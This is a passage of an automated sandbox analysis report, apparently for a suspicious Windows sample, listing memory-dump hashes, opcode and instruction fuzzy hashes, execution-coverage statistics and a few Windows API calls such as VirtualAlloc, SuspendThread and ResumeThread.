                                                    • Opcode Fuzzy Hash: 5353ca27da670a0163ef269fad2ec8f68e17442ff85a5ab27d11f9eb0bc0f1c3
                                                    • Instruction Fuzzy Hash: 9F4191B1E0CA5DCFEB98DB9884557ACBBF1FF59300F44416DD01ED7692CA74A8888B81
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 30b5b0188a2cf644f7ebd8cde1c79c5ae8ed86615c0d52cd7b0f5a7dbc576a9d
                                                    • Instruction ID: 70e36684ae044334bbbe64ab8eb26d8b261dd9c674894032237df9e57da20b7b
                                                    • Opcode Fuzzy Hash: 30b5b0188a2cf644f7ebd8cde1c79c5ae8ed86615c0d52cd7b0f5a7dbc576a9d
                                                    • Instruction Fuzzy Hash: 8F518470A4991D8FDB98EF18C898FA8B7B1FB69704F5041E9D10EE7261CA31AD85CF44
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 87780c126af16fffbdc15a1e3dbf8743263d07df8a5de6065f3cf57f68ef155b
                                                    • Instruction ID: 234ed18caea541a4419aafa2a20371b7db28fcf811460c50d4ccbb4c3f58f2e9
                                                    • Opcode Fuzzy Hash: 87780c126af16fffbdc15a1e3dbf8743263d07df8a5de6065f3cf57f68ef155b
                                                    • Instruction Fuzzy Hash: B4419574A5491D8FDB98EF18D899FA8B7B1FB68304F5041E9D10EE7261CA319E82CF44
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08041d54a43a29d1184d70157f1bcfe9c60b18bb2b8b35165ce5c3286d0ca5cd
                                                    • Instruction ID: a632ac835a5a3896c3fe4b153306ca37828f8aefcaf61e83046c5949f47e1d6e
                                                    • Opcode Fuzzy Hash: 08041d54a43a29d1184d70157f1bcfe9c60b18bb2b8b35165ce5c3286d0ca5cd
                                                    • Instruction Fuzzy Hash: 5D414F3260CA588FDF99EF28C495DA4B7E1FFA9710B0445AAD01EC3692DE24F845CBC5
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 37ecdc72a4fd46615866c1ee7dc0a6fcb7048b4665dd9a812313090c0086544a
                                                    • Instruction ID: bdb0399d873435667b9f8dcdd28e7955de7afbf28cb8148fa88ad29c92048513
                                                    • Opcode Fuzzy Hash: 37ecdc72a4fd46615866c1ee7dc0a6fcb7048b4665dd9a812313090c0086544a
                                                    • Instruction Fuzzy Hash: 77318D71A08E588FDB99EF28C095E64B7E1FFA931070446AAD05EC7692CE24F845CBC1
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c509333fe78de01d0380547465c9d52ac6e6e91d0413c04ad7884597bcfd15ee
                                                    • Instruction ID: dc404e68c808676e1882b6876af1841f40c1f1dcc59fc4de6b813ea21984565b
                                                    • Opcode Fuzzy Hash: c509333fe78de01d0380547465c9d52ac6e6e91d0413c04ad7884597bcfd15ee
                                                    • Instruction Fuzzy Hash: 82316B71608E588FDB98EF28C095EA4B7E1FFA971070446A9D01EC7692DE24F845CBC1
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c1304d605cbfbf6c6e27aca2ad55b55734ac47fd714c62f3574c146f7482be53
                                                    • Instruction ID: 3a0c17b1e116fbec9761812ddae756ebb5bed5b58b627145cbb345c53e273a75
                                                    • Opcode Fuzzy Hash: c1304d605cbfbf6c6e27aca2ad55b55734ac47fd714c62f3574c146f7482be53
                                                    • Instruction Fuzzy Hash: 3041E77091495D8FEB88EFA8C495AEDBBF1FF58301F10517AE40EE3295DB34A8458B90
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC685000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC685000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac685000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e001654af6a406ec6ad9da89742a24a4a035e2c018dde51f12b4b81894d2e9a1
                                                    • Instruction ID: f0a348b9aeec792b3d541852666780d4dc02c70a1f6c607da930162c17d7801c
                                                    • Opcode Fuzzy Hash: e001654af6a406ec6ad9da89742a24a4a035e2c018dde51f12b4b81894d2e9a1
                                                    • Instruction Fuzzy Hash: 4E31C37188E2859FE7178B305C535F63FA49F03311B1951E7E048CB4A2C62DA39AC3E2
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c6e2f8f90708e10fc4d9986dce50c8382d7406fb62edeeef39101dbb76e94747
                                                    • Instruction ID: 618e7b040321ffd95268b59cd9a31a2923ca213dc1175df1ea4948a226eb8c28
                                                    • Opcode Fuzzy Hash: c6e2f8f90708e10fc4d9986dce50c8382d7406fb62edeeef39101dbb76e94747
                                                    • Instruction Fuzzy Hash: 6941E730D19A1DCEEBA5DB18C8546F976B1EF5A351F6061BDC10DE2291DF34AA888F80
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • Opcode ID: 726f533fa739c932cfec5c7c34090d3aa062bd5a83cf0950b7ce67a7fe524656
                                                    • Instruction ID: 670360cdc8f15fb8cc13803c44750bb0814383a23711a57e5f23cec0f38ab7d7
                                                    • Opcode Fuzzy Hash: 726f533fa739c932cfec5c7c34090d3aa062bd5a83cf0950b7ce67a7fe524656
                                                    • Instruction Fuzzy Hash: 95E01223B1DE2C0B6698E66C78162FCA3C1E78863170143BFE44ED3396DD1A9D4242C5
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c675346f652f0deabe126f517fe7bb52c44940d7daed05705e08d61ec19cc6e5
                                                    • Instruction ID: 43a84c183d79e7da89431d45c17db64600817fd6830db57b4c91731e00516293
                                                    • Opcode Fuzzy Hash: c675346f652f0deabe126f517fe7bb52c44940d7daed05705e08d61ec19cc6e5
                                                    • Instruction Fuzzy Hash: EAF03F30A0991D8FDFA9DB08C890BA9B7B1FB69300F1045DA800EE7250CA31AA84CF50
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d5ec81ef8885838616d3c5236a447304b5d5448b2706501241893942e9dbc850
                                                    • Instruction ID: 59b5da63e9aa1c5faa7946516ad448bec5b318d9781ed0c074a62dacb6b25daf
                                                    • Opcode Fuzzy Hash: d5ec81ef8885838616d3c5236a447304b5d5448b2706501241893942e9dbc850
                                                    • Instruction Fuzzy Hash: 76F03A30E0460ACFEB84DF54C881ABEB7F1EF59310F10453AC429E3391DA38E9848B90
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d47bd54d451aa5c4ffbd446737ba5e1407740217987ede5d92bd13cd15a82e43
                                                    • Instruction ID: 56f800dc6f0f3604e49753df569d0029cb20a885a48c4184b96d86093933dd55
                                                    • Opcode Fuzzy Hash: d47bd54d451aa5c4ffbd446737ba5e1407740217987ede5d92bd13cd15a82e43
                                                    • Instruction Fuzzy Hash: A8F0D07090952ECEFB65DB18D8447E976B0FB55304F20B4BCD14EA32C1DA789984CF45
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c7c437762e224626516861a5cc4ea5372ee7abd2b1bbc9eb27ed116ac9cfb81e
                                                    • Instruction ID: f4bf918e32f48520e6c1143d7992d10c9bc3373b8b4fbfb2d8f5e8f18af8aa6a
                                                    • Opcode Fuzzy Hash: c7c437762e224626516861a5cc4ea5372ee7abd2b1bbc9eb27ed116ac9cfb81e
                                                    • Instruction Fuzzy Hash: E6F0346190651E8FF7A4DB18C855ABDB7A1FB88240F2051F9C00EA26C2DE346E868F80
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 16b534273e53b1bf534127624209fb8fce0cb814d38da2b827deb56d5dc2562a
                                                    • Instruction ID: 8086fa6e96fa2cd831a39db4e1881ae207e6f700072460f6dd637b5442b18d8e
                                                    • Opcode Fuzzy Hash: 16b534273e53b1bf534127624209fb8fce0cb814d38da2b827deb56d5dc2562a
                                                    • Instruction Fuzzy Hash: 21E0C97190895D9FEFA9DB14C890EA8BBB0EF26300F2484DDC04ED7292DE30A985CF41
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 37d6d1ac7af4328821d4f5385ac1f0e3febeb8b629708a19e8b7554ecc42e762
                                                    • Instruction ID: 88a54555300d3c96d9821dbe577708d9b8615bda01e61733d1edca75a0d1260d
                                                    • Opcode Fuzzy Hash: 37d6d1ac7af4328821d4f5385ac1f0e3febeb8b629708a19e8b7554ecc42e762
                                                    • Instruction Fuzzy Hash: 94D0C955B19A0B86BEA8A669046757A12C2EBA6680B8084B9E41ED3686EC18EC4902C0
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c8daa206dd006a2abb262f56e4aa2217bf7fd07e38f966d5c5c2519e653bf8d0
                                                    • Instruction ID: 04cca1e77179532c96177cb39d02250091adcf600c4f5110d5634aac36791fc7
                                                    • Opcode Fuzzy Hash: c8daa206dd006a2abb262f56e4aa2217bf7fd07e38f966d5c5c2519e653bf8d0
                                                    • Instruction Fuzzy Hash: E0E04234E19A2D8EEBA4EF18C8417E9B3B1FB5A700F5041E5904DE3245CA34AE85CF81
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6cc9f1cd73963b8e64c53a00d36f63db7e9bf6bb4ce46b5312eed3194358af05
                                                    • Instruction ID: dfeb9b7d9bfe7770cc68de0b013bc9047cba62807207c4a8e61efd82f35e6f9d
                                                    • Opcode Fuzzy Hash: 6cc9f1cd73963b8e64c53a00d36f63db7e9bf6bb4ce46b5312eed3194358af05
                                                    • Instruction Fuzzy Hash: 1CD0C912B0F517CDF6785701422027E61909F07B04F24C43EC0BF619C1CE2CF40962C1
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1746058467.00007FFAACDA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACDA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaacda0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 587af31ea369e36e3a95fe935c59aa69601c884c85df8785aa3ba9a88f9d6e6d
                                                    • Instruction ID: 82756e6e46b4f74baffddd642cb09372ee955b509ebd71ce13babfef2b673e36
                                                    • Opcode Fuzzy Hash: 587af31ea369e36e3a95fe935c59aa69601c884c85df8785aa3ba9a88f9d6e6d
                                                    • Instruction Fuzzy Hash: 39C04C11F4F343DFF62557E4485113C26901F0FA45B5446B5D51F8A2C3D89CB85863A5
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a9d92f76bb487c63074e397aa12bbe5f08c65161d12f7db3294501c60ec5e727
                                                    • Instruction ID: 7a7631306a418cebaf3c899fd67ad6b1175b3e8448158f51e11137849fcc9c2c
                                                    • Opcode Fuzzy Hash: a9d92f76bb487c63074e397aa12bbe5f08c65161d12f7db3294501c60ec5e727
                                                    • Instruction Fuzzy Hash: 72A0122084A00BC5F221971440083BC10505F02344F20707C800D14281CD3890480A41
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000014.00000002.1731809989.00007FFAAC650000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC650000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_20_2_7ffaac650000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: c9$!k9$"s9$#{9
                                                    • API String ID: 0-1692736845
                                                    • Opcode ID: f70d0f982a0d995bab07fe19af1c0b5607f8a86bf348a84dcacd7b9bded31570
                                                    • Instruction ID: 7b4d991c1b3f90524472fb2a8a7359a11591e8e60737d1575cd44c071575d68e
                                                    • Opcode Fuzzy Hash: f70d0f982a0d995bab07fe19af1c0b5607f8a86bf348a84dcacd7b9bded31570
                                                    • Instruction Fuzzy Hash: 0251D49BE0D56767E15233FCB4219EE9B44FF41779B08D63BD14EC92E34C08A88582D5

                                                    Execution Graph

                                                    Execution Coverage:6.7%
                                                    Dynamic/Decrypted Code Coverage:81.2%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:16
                                                    Total number of Limit Nodes:0
                                                    execution_graph 23404 7ffaac7f01a9 23405 7ffaac7f01b7 CloseHandle 23404->23405 23407 7ffaac7f0294 23405->23407 23400 7ffaac640710 23402 7ffaac653720 23400->23402 23401 7ffaac653acd VirtualAlloc 23403 7ffaac653b25 23401->23403 23402->23401 23408 7ffaac7f1e35 23409 7ffaac7f1e4f GetFileAttributesW 23408->23409 23411 7ffaac7f1f15 23409->23411 23392 7ffaac7f0040 23393 7ffaac7f007b ResumeThread 23392->23393 23395 7ffaac7f0154 23393->23395 23396 7ffaac7ee84d 23397 7ffaac7ee85b SuspendThread 23396->23397 23399 7ffaac7ee934 23397->23399

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1896992844.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaacd90000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: b4S$r6S$r6S$r6S
                                                    • API String ID: 0-2602100741

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1873120136.00007FFAAC675000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC675000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac675000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: )K_H$XV$p[U$r6S
                                                    • API String ID: 0-515783648

                                                    Control-flow Graph

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1873120136.00007FFAAC675000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC675000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac675000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: XV$p[U
                                                    • API String ID: 0-1301722620

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1896992844.00007FFAACD90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACD90000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaacd90000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:

                                                    Control-flow Graph

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1873120136.00007FFAAC640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC640000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac640000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 980 7ffaac7f0040-7ffaac7f0079 981 7ffaac7f007c-7ffaac7f0152 ResumeThread 980->981 982 7ffaac7f007b 980->982 986 7ffaac7f0154 981->986 987 7ffaac7f015a-7ffaac7f01a4 981->987 982->981 986->987
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1877671867.00007FFAAC7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac7e0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID:
                                                    • API String ID: 947044025-0

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 990 7ffaac7ee84d-7ffaac7ee859 991 7ffaac7ee864-7ffaac7ee932 SuspendThread 990->991 992 7ffaac7ee85b-7ffaac7ee863 990->992 996 7ffaac7ee934 991->996 997 7ffaac7ee93a-7ffaac7ee984 991->997 992->991 996->997
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1877671867.00007FFAAC7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac7e0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: SuspendThread
                                                    • String ID:
                                                    • API String ID: 3178671153-0
                                                    • Opcode ID: 0c92798a4fca5d7adf6c8e5094715295401a5ba7812d0c259efd2701a61e1134
                                                    • Instruction ID: 2b7185fbfbab0819ff84026e36f195a98ca663d03d48b283f24db43be9a01f99
                                                    • Opcode Fuzzy Hash: 0c92798a4fca5d7adf6c8e5094715295401a5ba7812d0c259efd2701a61e1134
                                                    • Instruction Fuzzy Hash: 8B413970D08A4D8FEB98DFA8D885BEDBBF0FB5A311F10416AD04DE7252DA70A845CB41

                                                    Control-flow Graph

                                                    control_flow_graph 1000 7ffaac7f1e35-7ffaac7f1f13 GetFileAttributesW 1004 7ffaac7f1f15 1000->1004 1005 7ffaac7f1f1b-7ffaac7f1f59 1000->1005 1004->1005
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1877671867.00007FFAAC7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac7e0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 437e7b63f52734702c34ff2faea326de814f50a53e5310087f0408a698732d38
                                                    • Instruction ID: 2dd9cf8e0b9152fcb796e93e21b0ef136fff302251bf51398ce326bb8c27a267
                                                    • Opcode Fuzzy Hash: 437e7b63f52734702c34ff2faea326de814f50a53e5310087f0408a698732d38
                                                    • Instruction Fuzzy Hash: 25411870D08A4C8FEB98DFA8D885BEDBBF1FB5A310F10416AD00DE7252DA70A845CB41
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000001A.00000002.1877671867.00007FFAAC7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7E0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_26_2_7ffaac7e0000_oqWNZWQNWoNnROlqjKcKhLM.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    • Opcode ID: fea99751a20d787d89fbec29a0e47418043d30309d6d87543882c38291e2eeef
                                                    • Instruction ID: 2a16e905c0086b6fa6b1e2a87e316f481fa237d1ae4b74408d70cfd1278d799d
                                                    • Opcode Fuzzy Hash: fea99751a20d787d89fbec29a0e47418043d30309d6d87543882c38291e2eeef
                                                    • Instruction Fuzzy Hash: 46416C7090875C8FDB59DFA8C888BECBBF0FB16310F1041AAD049E7292DA34A845CB41